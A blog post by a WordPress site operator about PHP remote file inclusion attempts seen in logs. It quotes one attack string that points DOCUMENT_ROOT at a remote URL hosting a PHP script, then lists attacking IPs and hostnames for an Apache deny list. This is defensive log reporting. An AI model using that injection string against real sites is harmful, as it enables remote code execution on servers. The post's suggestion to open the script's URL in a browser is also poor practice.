Since deploying a number of WordPress sites I have noticed a number of attempted attacks targetted against PHP. While the majority of these attempts are childlike and fail there still exist the possibility that these fruitless attempts are merely feelers designed to test the security of the system.
One of the more common attempts take the form of
_SERVER[DOCUMENT_ROOT]=http://aboutav.com//o/id1.txt???
which appears to be an attempt to change a system level variable in order to run the php script contained in the supplied URL. You can view this script by plugging the URL into your browser.
Our logs indicate that these attempts result in 301 redirects to the home page or result in a 404 error. Although these attempts appear to be harmless I am obviously not too happy about them so I am actively monitoring these requests for inclusion in our Apache global deny configuration file. For your convenience I have enumerated the offending IPs in this post.
- 211.234.100.46(211.234.100.46) Korea, Republic of
- 222.122.72.216(222.122.72.216) Korea, Republic of
- 211.227.241.149(211.227.241.149) Korea, Republic of
- 61.110.18.100(61.110.18.100) Korea, Republic of
- 222.122.72.216(222.122.72.216) Korea, Republic of
- client.superb.net(207.103.6.100) United States
- 211.239.157.203(211.239.157.203) Korea, Republic of
- 204.30.3.225(204.30.3.225) United States
- 85.25.236.152(85.25.236.152) Germany
- saturn.usedns.com(78.111.80.234) Russian Federation
- 204.15.230.189(204.15.230.189) United States
- 69-64-84-44.dedicated.abac.net(69.64.84.44) United States
- cp105.agava.net(89.108.67.95) Russian Federation
- 114.4.8.14(114.4.8.14) Indonesia
- 123.142.108.142(123.142.108.142) Korea, Republic of
- 82.195.150.228(82.195.150.228) Ireland
- correo.ccimarketplace.com(216.234.246.153) United States
- 2.sollink.net(65.18.168.84) United States
- at193.name4you.net(89.104.70.15) Russian Federation
- 117.110.59.2(117.110.59.2) Korea, Republic of
- ns.sun-nsk.ru(217.117.85.108) Russian Federation
- 72.11.145.8(72.11.145.8) United States
- 69-64-84-44.dedicated.abac.net(69.64.84.44) United States
- 118.107.163.230(118.107.163.230) Korea, Republic of
- 211.189.18.73(211.189.18.73) Korea, Republic of
- server.cityoffers.de(62.116.137.99) Germany
- webhostp1.ascogroup.it(151.8.79.19) Italy
- nostromo.blazearts.hu(81.2.253.202) Hungary
- host.prodimark.com(74.200.89.25) United States
- client.superb.net(207.103.6.100) United States
- 74.223.143.131.nw.nuvox.net(74.223.143.131) United States
- www.ebel.com.br(204.3.129.73) United States
- 69-64-84-44.dedicated.abac.net(69.64.84.44) United States
- 212186220246.teleweb.at(212.186.220.246) Austria
- sded3.atcihosting.com(206.225.23.4) United States
- 74.50.85.104(74.50.85.104) United States
- 211.75.220.49(211.75.220.49) Taiwan
- linhost01.turknetserver.com(193.192.122.30) Turkey
- sataweb.sata.com.sg(203.126.23.51) Singapore
- labor.allegri.unimo.it(155.185.215.15) Italy
- 59.27.95.144(59.27.95.144) Korea, Republic of
While these are just of few of the offending IPs, our quest to identify and eliminate them continues.